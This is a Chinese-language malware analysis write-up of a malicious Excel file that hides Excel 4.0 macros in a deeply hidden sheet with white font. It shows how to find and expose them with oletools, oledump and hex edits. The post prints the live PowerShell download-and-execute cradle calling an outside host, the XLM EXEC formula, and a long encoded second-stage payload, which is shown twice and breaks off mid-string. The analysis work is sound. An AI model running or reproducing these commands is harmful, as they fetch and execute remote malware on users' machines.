简介[出自:jiwo.org]
工欲善其事必先利其器，首先既然遇到的是宏病毒文件，所以本地得装好office，本文使用的环境为office2016，之后打开Excel。
咋和平时看到的Excel表格不一样？如果不嫌麻烦ocr一下图片里显示的意思大概是说得启用宏后才能查看到图片内容，本质就是诱惑用户来启用宏，所以文档存在宏代码的话一启动就被提示需要启用宏，别启用就对了。

对于宏病毒，笔者目前接（是）触（工）不（具）多（党），不过之前使用过一个Python工具oletools。如果是Python2.7环境则安装命令为：pip install oletools。

装好后，利用oletools工具里的mraptor(macrorapter)查看是否可疑，如下显示可疑文件：

如果使用olevba提取恶意宏会解析失败，如下：

如果之前没有过多接触宏病毒，到这里肯定就一头雾水。其实原因是该样本没有存在VBA宏，而是被检测到了Excel 4.0宏（这个技术存在的时间比我年龄还大，真的），属性设置为隐藏。

关于Excel 4.0宏暂时不过多介绍了，因为参考链接里介绍的很详细了，有兴趣就直接看文末的链接，没有兴趣直接看笔者接下来的操作。
不过虽然不能手工提取恶意代码，但是取巧也可以通过沙箱获取执行的命令，如下：

第一阶段命令，如下：

powershell -command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://putin-malwrhunterteams.com/scan.txt')

第二阶段命令scan.txt内容如下，会使用IEX命令当做脚本内容执行。

PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /e RgB1AG4AYwB0AGkAbwBuACAAWgBoAFoAZwB7ACAAcABhAHIAYQBtACgAJAB4AEkAeABmAG0AVABGAEwASAB2AFEAUgBOACAALAAgACQARwBQAHQARQBsAHQASwBTAGwAUwBCAEkARAB3AEEAcgBPAHAAaAByAGgARgB5AGcAeAB4ACAALAAgACQAcQBmAGoAeQBkAHoAbwBSAHgAUgBnAFAAQQBEAGUAWABmAGQAZABQAEoASwBRAGgAYQBrAFYAdwBBAFIATQBIAG8AdgBUAG4AQwBUAFgASQBQAGYAKQANAAoAJABEAGkAUwBDAFQAaABvAGcAUABDAFgAdABlAHIAUQBnAEYAWgBiAEUAawByAFYATABHAFUAQQBlAEgAcQB6AEEARAAgAD0AIAAnAHQAUwB5AEoAbgBHAEgAbgBYAHoAdwBlAGUAWABPAFcAVQBJAHkAYwBDAEwATgBIAHcAeQBoAEsAWQAnADsADQAKACQAQwBXAHAAdgB5AHkAaQB2AGwAVQB4AHgAVQBWAE8AYgBxAGQAUABsAFcAcQAgAD0AIAAnAGIAZgBpACcAOwANAAoAJAByAE0AbwBaAHcAIAA9ACAAJwB5AHgAYQBwAGkAWgBQAG8AWQBXAGUAZgBGACcAOwANAAoAJAByAHMAVgBJAEUAdQBtAEMATABVAE8AUQBQAHUAcQBqAHcAdgBBAGkAVgBZAG8AbQBIAEQAQQB4AHkAVABYAHcAWgByAE0AeQAgAD0AIAAnAGcAVgBCAGIAdwBsAEcAYgBTAEoAVgB4AG8AYQBqAGUAVwBWAFQARABpAEIAQQB1AHAARAByAHcAUgBxAFgAaABzAHIAUQBaAHkAJwA7AA0ACgAkAFkAbQBpAEwAbwB1AGUAIAA9ACAAJwBKAHQAJwA7AA0ACgAkAFIAQwBXAHQAdgBKAGUAVgBIAG0AcwB0AEoASgBiAGwAbwBGAHgASgBKAGcAUQB3AGcAVgBXAE0ARwBRAHAAdQB5AEgAIAA9ACAAJwBvAEIAJwA7AA0ACgB9AA0ACgAkAHgAaQBtAEUAcgBVAGcAdABZAEMATgBJAHEAdQBNAGsAZgBsAG0AWgBNAFoAbQBSAE8AcgB3AHkAdgBDAEkAbgBqAEEAIAA9ACAAJwBPAFgARQBvAHYAUQBuAHgAJwA7AA0ACgBJAGYAIAAoACcAegB4AFoAdQBpAE8AYgBQAEIAYwBiAFgAdwBVAHAAegBZAGkAJwAgAC0AZQBxACAAJwBWAHQAYQBZAHEAbQB4AE0AYgB3AHIASgBaAGMAUgBTAFIAUgBCAFAAZwBhAHQAbABIAFkAawBTAEMATwBvAFgAaABvAGIAYgBZAFoAagBIAGsAQgAnACkAIAB7AA0ACgAkAFMASwAgAD0AIAAnAEMAdgBlAEMAWQBpAFcAUwBSAHYAegBvAFEAUgBDAGYASwAnADsADQAKACQASABUAGIAawBBAHEAdAByAGgAdQBmAGYAIAA9ACAAJwBiAGIAcABWAHAAbwBBAHAARwBCAFAAVwBmAGIAagBJAFIARgBGAHEAbgBMAHEAJwA7AA0ACgAkAFMAdQBkAaABBAGMAbgBsAFYAWQBOAGIAdwBOAHIASgBYAEEAUwBNAE4AVgBQAEoAaQBRAG8AYQBvAG0AUABrAHgARAB1ACAAPQAgACcAcwBJACcAOwANAAoAJABZAGMAbABLAEMAVwAgAD0AIAAnAFUAcwBOAGcAUQBLAFgAZQBFAFoAWQB5AHkAawB0AdwBpAEkAYwBkAHQAUwByAFIATwB2AHQAJwA7AA0ACgAkAGMASwBNAG4AQgB2AHcATQBJAFcARgBNAFQAeQBWAGIAdABLAFYAbABQAG8AYgB1AHQARABiAFoAVwBPAEIAIAA9ACAAJwBkAHUAYgBPAE0ASwB3AHAAcQBBAG8ATABEAFAAJwA7AA0ACgAkAHYAdwBQAFkARQBhAEkAVQBvAGkAIAA9ACAAJwB0AHgAVABYAHAAdABWAHEAaQBZAFcASABPAGkATgBmACcAOwANAAoAfQANAAoAJABQAHoAUQBxAGUAdABnAGMASABxAHgAbwBWAGEAbgBmAHUAUgB5AFYAVABLAHYAcQBNAGcAbABZAHAAQQBwAHEAdQBPAEUAcABTAGEAUAAgAD0AIAAnAG4AdQBpAEMAWAAnADsADQAKAEQATwB7AA0ACgAkAFoAYgB0AFMATABUAG0AcABOAGcAWQBiAGsAbgB6AGwAdAB3AFMAdwBnAEcAYgBCAFEASABHAGQAawAgAD0AIAAnAEEAUABVAGIAQgBkAEsARwBTAGQAVQBSAGEAYQAnADsADQAKACQAZwBKAFQAVgBNAFQAWABqAHgAQgBTAHoAcgBDAEQATQBKAEYAeQBnAEkARwBJAGwAVwAgAD0AIAAnAG4AZABvAGIATwBnAEIAWQBrAHgAbgBIAFgAdgBkAGcAWABaAGkAZABTAEQAUAAnADsADQAKACQATABNAGIAdABVAFoAQQBoAHoAbABnAHQAdQBWAG4AbQAgAD0AIAAnAFQAUwBHAFoAQgBoAEQAQwBjAGoAaQBEAHMASQBqAE8AWABRAEMARQBJAEUASwB3AEYASQBsAFAAagBsAEIAbQB2AGYAegBsAEkAcwBKAGUAWQByACcAOwANAAoAJABxAFMAZQBHAGQAeABlAFgARgBrAGkAcABQAEgASgBUAHMAdwBuAFMAcgBoAHcASABOAEoAeABGAGUARwBZAGcAUQBNAFQAZQBiACAAPQAgACcASQBTAEYAJwA7AA0ACgAkAHcAQgBOAHAAagBlAHoAWQBRAGkAawBZACAAPQAgACcASgBWACcAOwANAAoAJABzAFQAegBZAHQAeQBNAEIAWgBEAG4AZQByAHEAbgBWAE4AZABrAHUAIAA9ACAAJwBYAFoAVABHAEYAcQBxAHYAcwBMAEsASQBGAEoAbwBTAGcAVQB5AG8ATABRAGcAcQBWAGgAYQB1AE8ASwBXAFkAYgBjAFUAdQBnAFMAbgAnADsADQAKACQATgB5AGkAPQAgACQATgB5AGkAIAArACAAMQA7AH0AIABXAGgAaQBsAGUAIAAoACQATgB5AGkAIAAtAG4AZQAgADYAKQANAAoAVwBoAGkAbABlACAAKAAkAFcARwBnAHIAZABWAG0AZwAgAC0AbgBlACAANgApACAAewANAAoAJABEAGcASgBtAEYAaQBIAHQAYwBsAFkAUAB2AGcAaABvAGwAaABjAG8AdQBsAE4AaABxAFMARgBrAG8ATgB6AHUAdAB1AEwAZABOAG0AVgB1AE4AQgBEACAAPQAgACcATwBzAGEAWgB5AEMAcwBvAEoAcwBGAFIAVABjAHYAbgBjAFgARQBQAGwAZQBXAEIAVgBFAGIAeQBMACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAGEAdABpAGYAVAB4AHIAZgBsAG0AVgBMAGsAQQBwAHQASwBrAHIAaQBSAHEAdwBvAHcAagBXAFoARAAgAD0AIAAnAGEAdABjAGIAUgBMAGoAbgBKAHgAdgB4AGwAUwB1AGEAdABWAEwAYwB0AHIASABkAFIAawB3AHQAagBqAGIAUwBiAHIATABiAGkASgBqACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAEoAVwBiAHQAbQBUAEUAZQB0AFYAcQBBAE8AYgBBAGoAbQB6AEoAZwBQAHAARABaAFcAZAAgAD0AIAAnAHQASABTAHIAawBtAGgAUwBXAFAATgBxAHgAZgBSAHoATwB0AGIAJwA7AA0ACgAkAFcARwBnAHIAZABWAG0AZwA9ACAAJABXAEcAZwByAGQAVgBtAGcAIAArACAAMQA7ACQAegByAGIAcAAgAD0AIAAnAHoAQwBPAFUAVABCAFgASgB5AEwAWABiAGQARgBPAGgASgBkAFUAWQBJAE0AQQB5AHEAcABnAHYAWgBWACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAGYAZABJACAAPQAgACcAagBUAHkARABOAHEAZwB5AFUAdQBZAGsAbgBNAFcAcQBOAEgAUQBhAG4AQgBRAGQAZQBVAGIAagBjAEkAcwAnADsADQAKACQAVwBHAGcAcgBkAFYAbQBnAD0AIAAkAFcARwBnAHIAZABWAG0AZwAgACsAIAAxADsAJABWAFYAZgBPAEwAYQBHAGgAYwBOAGYARQBSAEUAdABpAEQAZgBvAFkATgBoAHgAaABDAFUAWgB0AE8AeABXAE0AQwBiAFAAUgBoAEkAZQBEAIAA9ACAAJwB5AFoAVgBNAE0AYQBiAHQAZwB3AFQAVABrAG4AWQB4AEwAcgBBAE4AVABlAHIAVABDAHAAbwBjAEIAdgAnADsADQAKACQAVwBHAGcAcgBkAFYAbQBnAD0AIAAkAFcARwBnAHIAZABWAG0AZwAgACsAIAAxADsAfQANAAoARgB1AG4AYwB0AGkAbwBuACAAbwB2AHEAcgBtAFMAawB5AHgAUgBQAE8AbQB1AFEAeQBRAGMAcgBzAGsAbwBRAEcATABQAGEASABUAEwAdgBxAFIAQQBWAEYATwBCAGwAewAgAHAAYQByAGEAbQAoACQAQgBYAGUAIAAsACAAJABYAEwAcQBIAHoAUgBWAFEAWgBzAGkAcgBjAHQAagB4AG0AbQBuAFAAVABpAEMASwBXAGwAegByAGwAdgAgACwAIAAkAHYARgBFAEEAbQBVAGsAQgB2AHgATwBTAGIAVAB5AEwAaQAgACwAIAAkAHkATwBPAGsATwBQAG8ASgBnAGsATgBTAGQAZgBkAFoAIAAsACAAJABsAFkAcwB4AGMAQwBrAHIAUwBGAFEAYgBxAFkAWgBRAFoAbgBnAEUASwBxAG8ATABkAG8AegBvAGMAVABpAG8AQgAgACwAIAAkAE0AbgBxAFYAVgBNAGQAcwB3AEsAWQBoAHAATQBMARABzAHcAVgBjAHYAagBnAFQAbwBEAHcAIAAsACAAJAB5AFcAYwBaAEsATABsAGEARQBSAFUAYgBTAHUAIAAsACAAJABuAHYAeQBtAEEAWgBRAHEAcgBnAEUAUgBEAEoAQgBoAEoAaABkAHkAbgB3AEkAZgBCAEIAIAAsACAAJAB6AGEAYwB1AEsAQQBGAHMAWQBxAFEAdwBwAGkAZwBrAHMARgB0AGkAUQBEAGsATAApAA0ACgAkAGYAeABzAFIAUgBXAEcATABkAGoAQQBhAHQAVABKAEEAZgBrAGcAWABzACAAPQAgACcAZQBsAFYAWQB4AG0AWQBMAGoAUAByAFQATQBuAHYAegBvAHAASgBQAGUAagBMAFYAeAAnADsADQAKACQAcQBWAFoAZQBWAE8AZgBDAFMARwB2AHMAWQBUAG0AUgBBAGsAagBaAEgAVgBFAGcAdgByAE4AZAB5AHYAWgBBAGIAegB2AEQAbQBFAHUAZABvAEoAIAA9ACAAJwBwAEQAdwBRAHAAYwBOAGoAYQBtAFgAcQBWAFEAdABqAGQAQQAnADsADQAKACQARQBYAGcAIAA9ACAAJwBSAFkAWABpAGUAdgBxAEcAbAB4AEEAUABjAHoAYQBZAEEAbABMAHkATgBFAEoAYQBuAHQAVgBRAGMAbQBGAHgASQBIAGYAcwBSAHUAaQBuACcAOwANAAoAJABmAG0AcwBVAEIAUQBrAEQAYwBCAFQATABoAGgATQBQAHgAdgBsAGEAYQBkAHkAcwBEAEcAVQBUAGkARwBGACAAPQAgACcAWQBPAGkAUgAnADsADQAKACQARgBsAGMAbABNAEEAawBsAGwAYgBhAFMAYwBVACAAPQAgACcAdwBNAEoAQwBEAUgB2AHYAUQBVAFYAdgBRAG0AUwB6AHYAegBzAEoASgBwAE4AZABPAEcAUgBlAHUAQgBHAG0ARwBHAE0ARgBmAGUAUABvAHEAZwAnADsADQAKACQAcwBlAG8AVgB5AEkAYQBYAGMAYgBxAG4AVwB3AFoAWgB0AHoAIAA9ACAAJwBCAE8ATwBqAHAASwBhAE4AVABRAGoARQBTAGMAVgAnADsADQAKACQAeQBaAGwAVABXAFQAZQBkAEsAUQBTAHAASgBHAEYAVwBvAFoAZgAgAD0AIAAnAGQAdgB6AEsAWQB1ACcAOwANAAoAJABHAHQAWABYAEwAQgBhACAAPQAgACcAegBIAGcAdQBoAGsAbABaAFoAcgBsAEUATgBLAE4AUAB0AHcAUABzAEQAWgBiACcAOwANAAoAJABiAE4AWABrAG0AcwBIAG4AaQBmAEYAUABIAGYAeQBVAHIAVwBhAFMAbQBwAHMAdwBnAEgAZQBPAG0AaQBYAGEAZwBsAFMAVABOAEIAbQAgAD0AIAAnAGsAeABXAGkARQB4AEgATgB5AHUAQQBoAHoASQBJAG0AVQBiAEQAZgBPAHQAQgBBAEgAZgBpAFcAJwA7AA0ACgAkAGUASABxAGsAdQBpAG8AVABLAHIAaQBBACAAPQAgACcAUQByAGgAcQBhAFgAZABnAHoAbQB4AEcAUgByAHcAJwA7AA0ACgAkAGEAWgBQAGwAQQBUAG4ASgB4AEYAWgBUAFMASgBqAFYAZgB5AGMAIAA9ACAAJwBTAFIARgBLAHQAZwBlAFYAcwAnADsADQAKACQAYwByAHIAeABrAFMAVABPAFAAdwBFAFkAcwBWAHkASgBOAHEAQwBjAGIAUwBPAG4ARAAgAD0AIAAnAFUARQBzAFUAbwBTAFIAVQAnADsADQAKACQAaQBiAFYAWQBSAEMAUQBqAGYARQB1AFkAagBNAGoAUwBvAFMAUQBCAEoAYwBEAHQAYwAgAD0AIAAnAE8AVwB1AEkAbQBHAFkAcwBQAGgAcwBSAGsAWgBMAGoAagBqAEoAagBrAHIASgBDAEEAegBBAFQAUwBGAFgAYgB3AFQAbgB1AHAAWABTAG4AQQByACcAOwANAAoAJABCAFoAWABpAHEAcABhAHQAVQBrAHMATgBYAE0AcwBJAG4ARwBGAFoASgBKAFIAVQBRAG0AUQB1AEwAUgBWAGoAdAB1AEgAYwBjAFEASgBkAHMAIAA9ACAAJwBEAHIARABHAFEAaAB3AFAAZQBoAHUAJwA7AA0ACgB9AA0ACgAkAG4AcgBJAEMAUgBFAFkAZwBoAEQATwBKAFUAYwBGAFAAIAA9ACAAJwBXAHcAYwBoAHgARwBhAFEASwBWAGoAeAB3AG0AbwBvAGIASABQAFUAYQB6AEYARQBMAGUAegAnADsADQAKAEYAdQBuAGMAdABpAG8AbgAgAGoASABmAE8AVgBtAEEAdQBBAFIAbQBrAHEASQBBAHgATQBHAEgAawBVAFYAYgBBAHsAIABwAGEAcgBhAG0AKAAkAHUAbABuAGIAaABrAEkAawBTAGoAcABsAGgAbABHAGkAcABqAGwAUgBaAFUAcwBWAHAAIAAsACAAJABFAFgAcgBYAFYAVABIAHgAVwBZAGkASABRAE0AZQBEAFcAcgBSAGUAbQBvAHMAVwBPAGMAcwBoAEMAWgB0AFMAbQBsAGYAbAB0AHUATwBXACAALAAgACQAawBQAGkAQQBoAFMAWQBuAFcAeQBBAEQATABJAFAAZQBVAEkAdABhAFoAdQB3AGYAUAAgACwAIAAkAGUAaAB0AEoAYwBkAHYAQgBDAFoASwBXAGcASgBUAHUAZwBiAHMAIAAsACAAJABhAGQAUABHAFoAbABWAHYARABwAFMAQwBsACAALAAgACQAbwByAHUATQBXAFcASQBLAEcAcQBVAHkAKQANAAoAJABGAFcARwBRAFcAWgBtAGIASgBsAG8AWQBiAHgAUABrAFIAbgAgAD0AIAAnAEgAYwBmAE4ASQBNAHQAagBNAE4ASABPAGYAZQB0AFAAUQB1AGUAZQBzAEEASQAnADsADQAKACQAWABMAFkAbABKAHIAQQBDAGgAQgBzAHIAWgBJAHgARQBkAHAAWgBOAEMAWABJAHUAaABoAHoAcAAgAD0AIAAnAEoAaABIAFQAeQBxAHcAbgBJAGEAVQBNAEUAZwBkAGwAQwBwAEkAdwBaAEIAQwBhAHUAZgB6AEQAZQBFAGIAcwBLAE8AJwA7AA0ACgAkAFQAbABZAGIAUgBCAFEAVQBQAEYAQgB4AHEAZQBJAGYAcwBxAHMATgBJACAAPQAgACcAaABZAFQAcgB0AEkARQB5AGIAQwBxAEoASwBBAGQATwByAHYASgBnAG4AVQB0AGgASgBZACcAOwANAAoAJABZAGoAQgBSAEEAUABvAEUAegBJAFoASQBIAFEAUQBkAHoARwBoACAAPQAgACcASQBCAGUAegB4AEUAYwByAE0AZQBsAGkAVQBtAGYAUABhAGsAJwA7AA0ACgB9AA0ACgAkAHIAZQBnACAAPQAgACgAJwB7ADIAfQB7ADAAfQB7ADEAfQB7ADMAfQAnAC0AZgAnAGQAUwB0ACcALAAnAHIAaQBuACcALAAcIGAARABgAG8AYAB3AG4AYABsAGAAbwBhAB0gLAAnAGcAJwApADsAWwB2AG8AaQBkAF0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAFcAaQB0AGgAUABhAHIAdABpAGEAbABOAGEAbQBlACgAJwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAnACkAOwAkAGYAagA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AZQA0ADkAdQAwACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAEAAQAAiACwAIAAiADQANAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAgACIANwA4ACIAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBkAGwATwBNAHoAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAawAgAYQBjAGsAaQB0AHUAcABdADoAOgBlAHgAZQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA= | &('I'+'EX')

如何取消隐藏属性？

该样本是无法通过右键来取消隐藏的，因为首先文档里不显示宏工作表，想右键取消会发现没有选项，但是这里可以使用oledump这个工具辅助一下，使用的命令如下：

oledump_V0_0_50>oledump.py -p plugin_biff.py --pluginoptions "-o BOUNDSHEET -a"  C:\Users\onion\Desktop\Dokumentation.xls\Dokumentation.xls

得到位置序列：51 AA 02 00 01，0x00表示不隐藏，0x01表示隐藏，0x02表示深度隐藏。

直接手工修改十六进制，如下：

当保存后重新打开会出现宏工作表，不过宏代码目前是无法显示的，因为字体设置为白色了，也是为了对抗分析，增加迷惑性。

我们可以选中后更改字体颜色，让宏代码显示出来。

如何手工提取宏代码？
由于字体显示空白，可将其复制，之后再新建XLM 4.0宏表，粘贴至另外的宏工作表，然后全选中，接着修改文字颜色，就可以查看了。咦，出现了明显的PowerShell脚本痕迹。

最后整理一下，完整代码如下：

p://putin-malwrhunterteams.com/scan.txt');exit
=EXEC("powershell -command " & "IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'t" & A9588)
拿到响应内容，如下：

PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /e RgB1AG4AYwB0AGkAbwBuACAAWgBoAFoAZwB7ACAAcABhAHIAYQBtACgAJAB4AEkAeABmAG0AVABGAEwASAB2AFEAUgBOACAALAAgACQARwBQAHQARQBsAHQASwBTAGwAUwBCAEkARAB3AEEAcgBPAHAAaAByAGgARgB5AGcAeAB4ACAALAAgACQAcQBmAGoAeQBkAHoAbwBSAHgAUgBnAFAAQQBEAGUAWABmAGQAZABQAEoASwBRAGgAYQBrAFYAdwBBAFIATQBIAG8AdgBUAG4AQwBUAFgASQBQAGYAKQANAAoAJABEAGkAUwBDAFQAaABvAGcAUABDAFgAdABlAHIAUQBnAEYAWgBiAEUAawByAFYATABHAFUAQQBlAEgAcQB6AEEARAAgAD0AIAAnAHQAUwB5AEoAbgBHAEgAbgBYAHoAdwBlAGUAWABPAFcAVQBJAHkAYwBDAEwATgBIAHcAeQBoAEsAWQAnADsADQAKACQAQwBXAHAAdgB5AHkAaQB2AGwAVQB4AHgAVQBWAE8AYgBxAGQAUABsAFcAcQAgAD0AIAAnAGIAZgBpACcAOwANAAoAJAByAE0AbwBaAHcAIAA9ACAAJwB5AHgAYQBwAGkAWgBQAG8AWQBXAGUAZgBGACcAOwANAAoAJAByAHMAVgBJAEUAdQBtAEMATABVAE8AUQBQAHUAcQBqAHcAdgBBAGkAVgBZAG8AbQBIAEQAQQB4AHkAVABYAHcAWgByAE0AeQAgAD0AIAAnAGcAVgBCAGIAdwBsAEcAYgBTAEoAVgB4AG8AYQBqAGUAVwBWAFQARABpAEIAQQB1AHAARAByAHcAUgBxAFgAaABzAHIAUQBaAHkAJwA7AA0ACgAkAFkAbQBpAEwAbwB1AGUAIAA9ACAAJwBKAHQAJwA7AA0ACgAkAFIAQwBXAHQAdgBKAGUAVgBIAG0AcwB0AEoASgBiAGwAbwBGAHgASgBKAGcAUQB3AGcAVgBXAE0ARwBRAHAAdQB5AEgAIAA9ACAAJwBvAEIAJwA7AA0ACgB9AA0ACgAkAHgAaQBtAEUAcgBVAGcAdABZAEMATgBJAHEAdQBNAGsAZgBsAG0AWgBNAFoAbQBSAE8AcgB3AHkAdgBDAEkAbgBqAEEAIAA9ACAAJwBPAFgARQBvAHYAUQBuAHgAJwA7AA0ACgBJAGYAIAAoACcAegB4AFoAdQBpAE8AYgBQAEIAYwBiAFgAdwBVAHAAegBZAGkAJwAgAC0AZQBxACAAJwBWAHQAYQBZAHEAbQB4AE0AYgB3AHIASgBaAGMAUgBTAFIAUgBCAFAAZwBhAHQAbABIAFkAawBTAEMATwBvAFgAaABvAGIAYgBZAFoAagBIAGsAQgAnACkAIAB7AA0ACgAkAFMASwAgAD0AIAAnAEMAdgBlAEMAWQBpAFcAUwBSAHYAegBvAFEAUgBDAGYASwAnADsADQAKACQASABUAGIAawBBAHEAdAByAGgAdQBmAGYAIAA9ACAAJwBiAGIAcABWAHAAbwBBAHAARwBCAFAAVwBmAGIAagBJAFIARgBGAHEAbgBMAHEAJwA7AA0ACgAkAFMAdQBkAaABBAGMAbgBsAFYAWQBOAGIAdwBOAHIASgBYAEEAUwBNAE4AVgBQAEoAaQBRAG8AYQBvAG0AUABrAHgARAB1ACAAPQAgACcAcwBJACcAOwANAAoAJABZAGMAbABLAEMAVwAgAD0AIAAnAFUAcwBOAGcAUQBLAFgAZQBFAFoAWQB5AHkAawB0AdwBpAEkAYwBkAHQAUwByAFIATwB2AHQAJwA7AA0ACgAkAGMASwBNAG4AQgB2AHcATQBJAFcARgBNAFQAeQBWAGIAdABLAFYAbABQAG8AYgB1AHQARABiAFoAVwBPAEIAIAA9ACAAJwBkAHUAYgBPAE0ASwB3AHAAcQBBAG8ATABEAFAAJwA7AA0ACgAkAHYAdwBQAFkARQBhAEkAVQBvAGkAIAA9ACAAJwB0AHgAVABYAHAAdABWAHEAaQBZAFcASABPAGkATgBmACcAOwANAAoAfQANAAoAJABQAHoAUQBxAGUAdABnAGMASABxAHgAbwBWAGEAbgBmAHUAUgB5AFYAVABLAHYAcQBNAGcAbABZAHAAQQBwAHEAdQBPAEUAcABTAGEAUAAgAD0AIAAnAG4AdQBpAEMAWAAnADsADQAKAEQATwB7AA0ACgAkAFoAYgB0AFMATABUAG0AcABOAGcAWQBiAGsAbgB6AGwAdAB3AFMAdwBnAEcAYgBCAFEASABHAGQAawAgAD0AIAAnAEEAUABVAGIAQgBkAEsARwBTAGQAVQBSAGEAYQAnADsADQAKACQAZwBKAFQAVgBNAFQAWABqAHgAQgBTAHoAcgBDAEQATQBKAEYAeQBnAEkARwBJAGwAVwAgAD0AIAAnAG4AZABvAGIATwBnAEIAWQBrAHgAbgBIAFgAdgBkAGcAWABaAGkAZABTAEQAUAAnADsADQAKACQATABNAGIAdABVAFoAQQBoAHoAbABnAHQAdQBWAG4AbQAgAD0AIAAnAFQAUwBHAFoAQgBoAEQAQwBjAGoAaQBEAHMASQBqAE8AWABRAEMARQBJAEUASwB3AEYASQBsAFAAagBsAEIAbQB2AGYAegBsAEkAcwBKAGUAWQByACcAOwANAAoAJABxAFMAZQBHAGQAeABlAFgARgBrAGkAcABQAEgASgBUAHMAdwBuAFMAcgBoAHcASABOAEoAeABGAGUARwBZAGcAUQBNAFQAZQBiACAAPQAgACcASQBTAEYAJwA7AA0ACgAkAHcAQgBOAHAAagBlAHoAWQBRAGkAawBZACAAPQAgACcASgBWACcAOwANAAoAJABzAFQAegBZAHQAeQBNAEIAWgBEAG4AZQByAHEAbgBWAE4AZABrAHUAIAA9ACAAJwBYAFoAVABHAEYAcQBxAHYAcwBMAEsASQBGAEoAbwBTAGcAVQB5AG8ATABRAGcAcQBWAGgAYQB1AE8ASwBXAFkAYgBjAFUAdQBnAFMAbgAnADsADQAKACQATgB5AGkAPQAgACQATgB5AGkAIAArACAAMQA7AH0AIABXAGgAaQBsAGUAIAAoACQATgB5AGkAIAAtAG4AZQAgADYAKQANAAoAVwBoAGkAbABlACAAKAAkAFcARwBnAHIAZABWAG0AZwAgAC0AbgBlACAANgApACAAewANAAoAJABEAGcASgBtAEYAaQBIAHQAYwBsAFkAUAB2AGcAaABvAGwAaABjAG8AdQBsAE4AaABxAFMARgBrAG8ATgB6AHUAdAB1AEwAZABOAG0AVgB1AE4AQgBEACAAPQAgACcATwBzAGEAWgB5AEMAcwBvAEoAcwBGAFIAVABjAHYAbgBjAFgARQBQAGwAZQBXAEIAVgBFAGIAeQBMACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAGEAdABpAGYAVAB4AHIAZgBsAG0AVgBMAGsAQQBwAHQASwBrAHIAaQBSAHEAdwBvAHcAagBXAFoARAAgAD0AIAAnAGEAdABjAGIAUgBMAGoAbgBKAHgAdgB4AGwAUwB1AGEAdABWAEwAYwB0AHIASABkAFIAawB3AHQAagBqAGIAUwBiAHIATABiAGkASgBqACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAEoAVwBiAHQAbQBUAEUAZQB0AFYAcQBBAE8AYgBBAGoAbQB6AEoAZwBQAHAARABaAFcAZAAgAD0AIAAnAHQASABTAHIAawBtAGgAUwBXAFAATgBxAHgAZgBSAHoATwB0AGIAJwA7AA0ACgAkAFcARwBnAHIAZABWAG0AZwA9ACAAJABXAEcAZwByAGQAVgBtAGcAIAArACAAMQA7ACQAegByAGIAcAAgAD0AIAAnAHoAQwBPAFUAVABCAFgASgB5AEwAWABiAGQARgBPAGgASgBkAFUAWQBJAE0AQQB5AHEAcABnAHYAWgBWACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAGYAZABJACAAPQAgACcAagBUAHkARABOAHEAZwB5AFUAdQBZAGsAbgBNAFcAcQBOAEgAUQBhAG4AQgBRAGQAZQBVAGIAagBjAEkAcwAnADsADQAKACQAVwBHAGcAcgBkAFYAbQBnAD0AIAAkAFcARwBnAHIAZABWAG0AZwAgACsAIAAxADsAJABWAFYAZgBPAEwAYQBHAGg